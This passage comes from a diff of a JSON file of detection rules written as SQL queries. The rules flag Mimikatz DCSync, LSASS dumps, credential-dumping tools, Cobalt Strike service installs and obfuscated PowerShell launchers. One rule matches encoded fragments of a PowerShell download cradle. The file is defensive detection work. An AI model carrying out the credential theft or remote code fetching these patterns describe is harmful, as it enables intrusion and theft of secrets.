'%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + 
"Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of remote PowerShell execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r 
%' ESCAPE '\\'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": 
"bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - 
"tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Password Protected ZIP File Opened (Suspicious Filenames)", + "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "status": "experimental", + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate used of encrypted ZIP files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_opened_encrypted_zip_filename.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", - "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such 
as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Cred Dump Tools Dropped Files", - "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects well-known credential dumping tools execution via 
service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.credential_access", + "attack.execution", "attack.t1003.001", "attack.t1003.002", - "attack.t1003.003", "attack.t1003.004", - "attack.t1003.005" + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Dumpy.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_cred_dump_tools_dropped_files.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "CVE-2021-26858 Exchange Exploitation", - "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", - "author": "Bhabesh Raj", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.t1203", "attack.execution", - "cve.2021.26858" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
(Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2021_26858_msexchange.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -23906,205 +23357,226 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. 
Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": 
"ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", - "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "status": "experimental", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE 